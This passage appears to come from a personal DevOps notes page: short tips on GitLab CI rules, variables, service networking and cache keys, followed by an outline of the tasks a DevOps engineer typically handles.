The variable is set on the job if the conditions inside the rules are met! This is so powerful since it will allow for dynamic jobs (change jobs based on variables).

job:
  variables:
    DEPLOY_VARIABLE: "default-deploy"
  rules:
    - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH
      variables:                              # Override DEPLOY_VARIABLE defined
        DEPLOY_VARIABLE: "deploy-production"  # at the job level.
    - if: $CI_COMMIT_REF_NAME =~ /feature/
      variables:
        IS_A_FEATURE: "true"                  # Define a new variable.
  script:
    - echo "Run script with $DEPLOY_VARIABLE as an argument"
    - echo "Run another script if $IS_A_FEATURE exists"

More in the docs

Service Intercommunication

services docker links to connect the running job (build) to the other containers defined in services. So the connection is one to many from the build job to the services.

https://docs.gitlab.com/ee/ci/services/#debug-a-job-locally.

To enable intercommunication between services, we use FF_NETWORK_PER_BUILD feature flag which replaces the links with user-defined bridge network.

More here!

cache:key:files does not support variables

Gitlab does not yet support variables in cache:key:files.

https://docs.gitlab.com/ee/ci/variables/where_variables_can_be_used.html

This does not work, the cache created uses default as its key and does not take the file into consideration.

cache:
  key:
    files:
      - $CI_PROJECT_DIR/cache-key.txt
  paths:
    - $CI_PROJECT_DIR/hello.txt

Nested Variables

Gitlab started supporting nested variables in 13.10 (under feature-flag).

BUILD_ROOT_DIR: '${CI_BUILDS_DIR}'

Docs

DevOps Guide

DevOps engineering

"DevOps Engineer"" is a highly relative job title. Purists will tell you the term makes no sense because DevOps is a methodology, not a person. Yet, you will find thousands of job listings, each defining the role differently.

In many cases, these positions are simply rebranded Operations engineers or SysAdmin roles equipped with modern tooling. However, the actual scope of a DevOps Engineer varies widely and typically entails one or more of the following tasks:

  • Build: Core Infrastructure & Operations
    • Provisioning and maintaining resources, whether on-premise or in the cloud.
    • System Administration: Installing, patching, and maintaining OS-level components (Linux/Windows). This includes managing users, permissions, and filesystems.
    • Configuration Management: Automating the setup and maintenance of software configurations across servers.
    • Networking & Storage: Managing software-defined networking (VPCs, subnets) and storage volumes.
    • Operations Management: Handling routine maintenance, backups, and general system health.
    • Database Management: Basic provisioning, replication setup, and ensuring data persistence.
  • Design: Architecture & Design
    • System Design: Architecting solutions based on needs, e.g. choosing between loosely coupled (microservices) or tightly coupled (monoliths) structures.
    • High Availability & Scalability Strategy: Designing systems to withstand traffic spikes (auto-scaling) and regional failures (redundancy).
    • Cloud Architecture: eciding which managed services (Serverless, Managed SQL, Object Storage) to use versus building from scratch.
  • automate: Automation & Tooling
    • Automation: Replacing manual UI interactions with reproducible code.
    • Scripting & Middleware Development: Writing scripts to connect tools that don't natively talk to each other.
    • Infrastructure as Code (IaC): Defining the entire environment in configuration files rather than manual setup.
  • Release Engineering & Software Supply Chain
    • Software Supply Chain Management: Managing dependencies, auditing libraries for safety, and generating Software Bill of Materials (SBOM).
    • Deployment Strategy (e.g., Weekly Deployment): Executing releases using strategies like "Blue/Green" swaps or "Canary" releases to limit the blast radius of errors.
    • Version Control Management: Enforcing branching strategies (e.g., GitFlow vs. Trunk-Based) to keep code organized.
    • Artifact Management: Securing compiled binaries and container images in private registries.
  • Operate: Reliability & Incident Management (SRE)
    • Monitoring & Observability: Setting up dashboards to track metrics (CPU, latency), logs (errors), and traces (user journey).
    • Incident Response: Acting as the first responder during outages to triage and coordinate fixes.
    • Post-Incident Review (Post-Mortems): Writing Root Cause Analysis (RCA) reports after incidents to prevent recurrence.
    • Chaos Engineering: Stress-testing systems by intentionally breaking components to ensure recovery automation works.
  • Help: Developer Experience (DevEx)
    • Developer Environment Building: Creating pre-configured environments (e.g., DevContainers) so new hires can code on Day 1 without setup friction.
    • Internal Developer Platform (IDP): Building self-service portals where developers can provision their own resources without blocking Ops.
    • Documentation & Knowledge Base: Maintaining runbooks and wikis to prevent "brain drain" when engineers leave.
  • Protect: Security & Governance (DevSecOps)
    • Security & Compliance: Ensuring infrastructure meets legal standards (GDPR, HIPAA, PCI-DSS) and internal policies.
    • Identity & Access Management (IAM): Enforcing "Least Privilege" to ensure developers don't have unnecessary "God mode" access to production.
    • Vulnerability Scanning: Automating security checks for both infrastructure (OS patches) and application code (libraries).
  • Collaborate: Culture & People
    • Team Support: Acting as a technical unblocker for development teams.
    • Coaching: Providing DevOps coaching to teams to instill cultural best practices.
    • FinOps: Monitoring cloud costs and guiding teams toward architecting cost-effective solutions.

Fundamentals

Networking

Storage

Linux